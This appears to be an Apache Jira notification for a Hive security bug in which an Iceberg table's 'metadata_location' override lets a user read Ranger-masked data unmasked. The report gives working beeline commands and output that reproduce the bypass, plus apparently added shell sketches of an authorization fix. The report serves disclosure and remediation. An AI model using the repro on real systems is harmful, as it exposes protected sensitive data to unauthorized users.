[ https://issues.apache.org/jira/browse/HIVE-27713?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Janos Kovacs reassigned HIVE-27713:
-----------------------------------

    Assignee: Ayush Saxena  (was: Ayush Saxena)

> Iceberg: metadata location overrides can cause data breach
> ----------------------------------------------------------
>
>                 Key: HIVE-27713
>                 URL: https://issues.apache.org/jira/browse/HIVE-27713
>             Project: Hive
>          Issue Type: Bug
>          Components: Authorization, Iceberg integration
>    Affects Versions: 4.0.0-alpha-2
>            Reporter: Janos Kovacs
>            Assignee: Ayush Saxena
>            Priority: Major
>              Labels: check
>
> Set to bug/blocker instead of enhancement due to its security-related nature; 
> Hive 4 should not be released without a fix for this. Please reset if needed.
>  
> Context: 
>  * There are some core tables with sensitive data that users can only query 
> with data masking enforced (e.g. via Ranger). Let's assume this is the 
> `default.icebergsecured` table.
>  * As expected, an end user can only access the masked form of the sensitive 
> data.
>  * The users also have the privilege to create new tables in their own sandbox 
> databases; let's assume this is the `default.trojanhorse` table for now.
>  * The user can create a malicious table that exposes the sensitive data 
> unmasked, leading to a possible data breach.
>  * Hive runs with doAs=false so that it can enforce FGAC (fine-grained access 
> control) and end users do not need direct file-system access.
>
> Repro:
>  * First make sure the data is secured by the masking policy:
> {noformat}
> <kinit as privileged user>
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) 
> STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES ('You might be allowed to see this.','You are NOT allowed to see this!');
> "
> <kinit as end user>
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +------------------------------------+--------------------------------+
> |         icebergsecured.txt         |     icebergsecured.secret      |
> +------------------------------------+--------------------------------+
> | You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
> +------------------------------------+--------------------------------+
> {noformat}
>  * Now let the user create the malicious table that exposes the sensitive data:
> {noformat}
> <kinit as end user>
> SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" \
>   beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |
>   grep metadata_location | grep -v previous_metadata_location | awk '{print $5}')
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorse;
> CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED 
> BY ICEBERG
> TBLPROPERTIES (
>   'metadata_location'='${SECURED_META_LOCATION}');
> SELECT * FROM default.trojanhorse;
> "
> +------------------------------------+-----------------------------------+
> |          trojanhorse.txt           |        trojanhorse.secret         |
> +------------------------------------+-----------------------------------+
> | You might be allowed to see this.  | You are not allowed to see this!  |
> +------------------------------------+-----------------------------------+
> {noformat}
>  
> Currently (after HIVE-26707), the RWSTORAGE authorization URI contains either 
> the dummy metadata path or the explicitly set metadata path:
> {noformat}
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on 
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on 
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
>  
> {noformat}
> With a custom location, the path is not even passed to the authorizer; the URI still points at the dummy file:
> {noformat}
> 2023-05-17 19:38:51,867 INFO  org.apache.hadoop.hive.ql.Driver: 
> [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: 
> Compiling 
> command(queryId=hive_20230517193851_8b9f0ad7-2ae1-4078-b76a-e51c31321b0b): 
> CREATE EXTERNAL TABLE default.policytestth (txt string, secret string) STORED 
> BY ICEBERG 
> TBLPROPERTIES (
>   
> 'metadata_location'='hdfs://test.local.host:8020/warehouse/tablespace/external/hive/policytest/metadata/00001-a3e46c1b-318b-4b46-886a-c6ea591f63c1.metadata.json')
> ...
> 2023-05-17 19:38:51,898 DEBUG 
> org.apache.iceberg.mr.hive.HiveIcebergStorageHandler: 
> [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: 
> Iceberg storage handler authorization URI 
> iceberg://default/policytestth?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Fpolicytestth%2Fmetadata%2Fdummy.metadata.json
> {noformat}
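The logged URIs suggest that the authorization URI has the form `iceberg://<db>/<table>?snapshot=<URL-encoded metadata path>`. The POSIX shell sketch below reproduces that format and illustrates the "custom location needs to be passed to the Authorizer" change: when `metadata_location` is set, it is used in place of the dummy path. The helper name `iceberg_auth_uri` is hypothetical; the format is inferred from the log lines, not taken from the `HiveIcebergStorageHandler` source. Dropping the scheme/authority and encoding only `/` are assumptions based on the logged paths.

```sh
# Hypothetical helper: prints an authorization URI in the format seen in the
# logs above: iceberg://<db>/<table>?snapshot=<URL-encoded path>.
# Assumptions: only the path component goes into 'snapshot' (scheme and
# authority dropped), and '/' is the only character that needs encoding.
iceberg_auth_uri() (
  db=$1 table=$2 table_location=$3 metadata_location=${4:-}
  if [ -n "$metadata_location" ]; then
    # Explicit metadata_location: the authorizer must see the real target.
    path=$metadata_location
  else
    # No override: dummy file under the table's own location.
    path="${table_location%/}/metadata/dummy.metadata.json"
  fi
  # Strip a scheme://authority prefix such as hdfs://host:8020, keep the path.
  case $path in
    *://*) path="/${path#*://*/}" ;;
  esac
  # Encode '/' as %2F, matching the logged URIs.
  encoded=$(printf '%s' "$path" | sed 's|/|%2F|g')
  printf 'iceberg://%s/%s?snapshot=%s\n' "$db" "$table" "$encoded"
)
```

With the values from the logs, `iceberg_auth_uri default trojanhorse /warehouse/tablespace/external/hive/trojanhorse` prints the dummy URI from the first RWSTORAGE denial. Passing the `policytest` metadata file as the fourth argument for `policytestth` yields a URI that points at `policytest`'s metadata, which is the path the authorizer would need to check.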
>  
> Mandatory changes required to secure tables:
>  * The custom location needs to be passed to the Authorizer.
>
> Changes required for usability, e.g. to eliminate the need for a policy for 
> each table:
>  * The default location needs to be calculated from the warehouse/database 
> default location.
>  * CREATE/ALTER with default locations should either skip RWSTORAGE 
> authorization or be handled in a special way by the Authorizer. 
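For the usability changes, the check below sketches how an authorizer might decide that a `metadata_location` is the table's default one (under `<database location>/<table>/metadata/`) and so needs no per-table RWSTORAGE policy, while any other location still goes through RWSTORAGE authorization. This is a hypothetical POSIX shell illustration, not Hive's or Ranger's logic. The function name `is_default_metadata_location`, the `<database location>/<table>` layout, and the literal prefix comparison (both paths given in the same fully qualified form) are all assumptions. It also rejects `..` segments, because a plain prefix test could otherwise be bypassed by a path that walks back out of the table directory.

```sh
# Hypothetical check: exit status 0 if metadata_location lies under
# <db_location>/<table>/metadata/ (default location, no per-table RWSTORAGE
# policy needed), 1 otherwise (custom location, RWSTORAGE check required).
# Assumption: both paths use the same fully qualified form (same scheme/host).
is_default_metadata_location() (
  db_location=${1%/} table=$2 metadata_location=$3
  # Reject '..' segments so the path cannot escape the table directory.
  case "/$metadata_location/" in
    */../*) exit 1 ;;
  esac
  expected_prefix="$db_location/$table/metadata/"
  # Quoted pattern: the prefix is matched literally, not as a glob.
  case $metadata_location in
    "$expected_prefix"*) exit 0 ;;
  esac
  exit 1
)
```

With `DB=hdfs://test.local.host:8020/warehouse/tablespace/external/hive`, the `policytestth` table pointing at `policytest`'s metadata file is reported as non-default (exit status 1), so the authorizer would still have to check RWSTORAGE on that path.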



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
